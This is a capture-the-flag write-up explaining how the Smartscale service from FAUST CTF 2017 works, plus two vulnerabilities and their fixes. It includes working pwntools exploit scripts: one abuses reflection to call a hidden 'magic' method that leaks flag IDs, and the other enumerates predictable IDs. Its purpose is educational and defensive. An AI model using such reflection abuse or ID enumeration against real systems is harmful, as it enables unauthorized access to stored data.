Saarsec

saarsec

Schwenk and pwn

FAUST CTF 2017 Smartscale Writeup

FAUST CTF’17: Smartscale Writeup

Having achieved first blood for this service in the FaustCTF 2017, we, the Saarsec team and in particular the subteam that cracked this service, were given the opportunity to provide a write-up for the Smartscale challenge. Hence, in this write-up we will explain how Smartscale works and how to attack and defend it.

General

Smartscale is a classical Java service that can be started from the command line, reads its commands from standard in and responds to standard out. However, what makes Smartscale particularly interesting is the way it is compiled and executed. Even though it is compiled from a regular Java project with a main method and several classes, it is compiled for Android’s register-based Dalvik Virtual Machine using the dx tool and then executed in the new Android Runtime (ART) that was compiled for x86.

Compilation Toolchain

In general, Android apps are written in Java (or Kotlin) and compiled to .class files using a regular Java compiler. Afterwards, the code is transformed to Android’s own bytecode representation (.dex files) using the dx tool. With the introduction of ART in Android 5, the Android Runtime additionaly decides whether executed applications are interpreted using the Dalvik Virtual Machine or compiled down to native code using the new dex2oat on-device compiler. In our case, the service binary is a dex bytecode file that is executed with a version of ART that is compiled for x86.

Service Execution

Due to a port activated socket, each connection on the service port 31337 triggered the execution of the service bytecode within art:

art/bin/art -cp SmartScale.dex data/

While art/ stored all files necessary for the Android Runtime to work on x86 (binaries, libraries, …), the data/directory stores the flags.

Analysis

In contrast to actual binaries, Android bytecode is very high level so that it can be decompiled easily using readily-available tools. In our case, we utilized the jadx decompiler to decompile it to Java, exported it as a gradle project and imported it into Intellij. Furtunately, most of the code could be successfully decompiled.

Functionality

On an abstract level, Smartscale acts as a key-value-store that stores flags under IDs that are returned and retrieves the flag again given the corresponding flag ID. For the communication, data is transmitted via json objects.

SmartScale is the main class and entry point into the program. It reads the json input from standard in and writes the output to standard out. It differentiates between two modes of operation, depending on the request json: storage and retrieval.

Storage

When the gameserver stores a flag, a json object of the following format is transmitted:

{
	"action": "store",
	"data": {
		"size": 2.11,
		"fat_quotient": 0.49,
		"weight": 109.77,
		"comment": "FAUST_WSg6gA8ElaRHygAAAACJm5riKb4LikA5",
		"tasks": ["task1", "task2"]
	}
}

While size, weight and the like explain why the service is called Smartscale, the more interesting key are comment, and tasks. The comments appended to the measurements are used by the gameserver to transport the flags to the services. The hash is a checksum over the weight and the comment. tasks, however, is the most interesting, since it carries a list of method names in the Data class that is used to wrap json objects and takes care of marshalling them. Each method for which the name is written down in the tasks list is invoked via reflection, indicating the first vulnerability. When the gameserver uses the service, this value is empty and by default set to calculateBMI , which will do exactly that, calculate the BMI given the values of the json object. Afterwards, a new identifier is created and used as a file name to persist the json object before it is returned to the sender as the flag ID.

Retrieval

For retrieving flags, the following json format is used:

{
	"action": "retrieve",
	"flag_id": <string>
}

Given a flag ID, the service searches for a file with this name and, if successfull, reads the stored json object and returns it in a response json of the following form:

{
	"status": "ok",
	"data": {
		"size": 2.11,
		"fat_quotient": 0.49,
		"bmi": 24.655780418229,
		"weight": 109.77,
		"comment": "FAUST_WSg6gA8ElaRHygAAAACJm5riKb4LikA5",
		"hash": "2281812b439641f374fcfb022c4956b7"
	}
}

Vulnerabilities

Magic

As already mentioned, providing method names under the tasks key when storing data, it is possible to invoke methods of the Dataclass via reflection. In particular, there is a very interesting method called magic that is never invoked in the regular code, but nevertheless present in the bytecode. If invoked, it collects and returns recent flag IDs that we can use to obtain flags.

Exploit

The exploit idea is the following: First, we send a storage request with the magic task. Second, we use the returned list of flag IDs to request the json objects that carry the flags under the comment key. The following python code depicts a simplified sample exploit:

from pwn import *

r = remote(sys.argv[1], 31337)
data = dict()
data['weight'] = 99.99
data['size'] = 1.62
data['fat_quotient'] = 0.10
data['comment'] = "Hello World"
data['tasks'] = ['magic']

d = dict()
d['action'] = 'store'
d['data'] = data

r.sendline(json.dumps(d))

data_read = r.recvline(2)
data = json.loads(data_read)

for fid in data['flag_ids']:
    tmp = dict()
    tmp['action'] = 'retrieve'
    tmp['flag_id'] = fid

    r2 = remote(sys.argv[1], 31337)
    r2.sendline(json.dumps(tmp))

    print(r2.recvline(timeout = 2))

It basically creates a new connection for each obtained flag id, retrieves and prints the response including the flag.

Mitigation

There are several possibilities to patch this vulnerability. While it is straightforward to nop out the magic function, we suggest to replace the whole reflection code with a hardcoded invocation of calculateBMI. Why? Because reflection is overkill in the first place when all that needs to be executed is a known accessible method. And in addition, reflection is evil, right?

This can be done by, e.g., decompiling the code to smali using the well-known apktool. smali is a more readable version of dex bytecode and allows for easy modification and recompilation without having to deal with offsets. For this challenge, we used the bytecode viewer tool that combines multiple decompilers but can also display the smali version of the code. In additon, it allows for modifications and can export the result.

Guessable Flag IDs

The second vulnerability is based on the fact that flag IDs are easily guessable. The following decompiled code depicts the code generation:

private static String generateId() {
    File[] listFiles = DIR.listFiles();
    if (listFiles != null) {
        Arrays.sort(listFiles);
        int length = listFiles.length - 1;
        while (length >= 0) {
            try {
                return Long.toHexString(Long.parseLong(listFiles[length].getName(), 16) + 10);
            } catch (Exception e) {
                length--;
            }
        }
    }
    return Long.toHexString(428381535063902626L);
}

DIR is the flag storage directory, in our case data/.

Exploit

Based on this, we can easily guess flag IDs. In particular, it is straightford to enumerate them by repeatedly adding 10. This leads us to our second exploit:

from pwn import *

r = remote(sys.argv[1], 31337)

data = dict()
data['weight'] = 12.13
data['size'] = 1.78
data['fat_quotient'] = 0.99
data['comment'] = 'Hello World'

d = dict()
d['action'] = 'store'
d['data'] = data
r.sendline(json.dumps(d))

data_read = r.recvline(2)
print data_read
data = json.loads(data_read)

fid = int(data['flag_id'], 16)

print 'flagId: ', fid

for i in range(0, 30):
    fid_str = hex(fid - (10 * i))[2:]

    tmp = dict()
    tmp['action'] = 'retrieve'
    tmp['flag_id'] = fid_str

    r2 = remote(sys.argv[1], 31337)
    print json.dumps(tmp)
    r2.sendline(json.dumps(tmp))

    print r2.recvline(timeout=2)

Mitigation

In general, replacing the current implementation of generateId with non-guessable variant does the job. We, for example, decided to go for sha256 hashing a (secure) random value. As the flag ID is returned, we do not even have to adhere to the current flag ID format or size. The gameserver will happily use whatever we provide it with, hence we are completely free to change the method at will.

Noteworthy

There are some more interesting facts about the smartscale challenge that we did not yet discuss.

AwesomeHash

Smartscale ships with its own dedicated hash function that is used to compute the checksums. Since the hash code could not be decompiled completely and it is very hard to get crypto implementations right, there is probably something wrong with the implementation. However, as the checksum is needed for neither request type, we completely ignored it during the CTF. At this point, we invite the interested reader to have a look herself =)

Hello.{java, class, dex, oat}

Hidden in the art/folder, there are 4 files called Hello, each representing a different stage of compilation. There are multiple possibilities why they are here, here are some guesses:

  1. They indicate the toolchain used to compile and run the code in ART. This would mean that they are a hint for players not experienced with Android and ART on what happens to a Java source file.
  2. They indicate a vulnerability. We actually checked for this. Because one of the ideas was that code might be added in one of the compilers (this idea might be inspired by one of the papers of one of this write-up’s authors ;-) ), we inspected the source code, the class and dex bytecode and also the compiled oat file. For the latter, the oatdump tool reveals that it was actually compiled from the corresponding Hello.dex file with no additional methods and no extra or changed code (at least none that we found). In general, all 4 files seem to correspond to the same functinality.
  3. They were a simple test case for ART running on x86 and were not removed by the service’s authors. This is actually the most probable one since the code is extremely simplistic: it just prints Hello!

Even though we are pretty confident there is no hidden code in there, we are still not completely sure why those files are here, even though 3. is possible and probable. I guess this is something we will ask the organizers directly.

Reproducibility

In case you want to play around with Smartscale yourself, it is straightforward to use it locally. No need for port activated sockets, you can directly start the service from your python scripts. For example, by replacing the remote tube with process('./art/bin/art -cp SmartScale.dex ninja.faust.smartscale.SmartScale data/', shell=True), the above described exploits can be fired against the service directly.

Final Remarks

While the Faust CTF 2017 had very interesting services in general, this particular challenge was very special due to the fact that it was executed in an x86 version of the Android Runtime, but it was not an Android app but a regular Java application that was just compiled for Android. The result is that for pwning and fixing the service, you need to know not only Java but also the Android toolchain, since patching is non-straightforward if you do not know about, e.g., smali. If you, however, are by chance an Android developer or even a researcher in this field (guilty =) ), this service was perfectly suited for you.

In conclusion, we had a lot of fun reading through the code, attacking and patching it, and it was great to finally be able to also apply Android skills to a CTF challenge. Especially for attack-defense-CTFs, this is a rarity. Cheers at this point to our friends from FAUST, well done!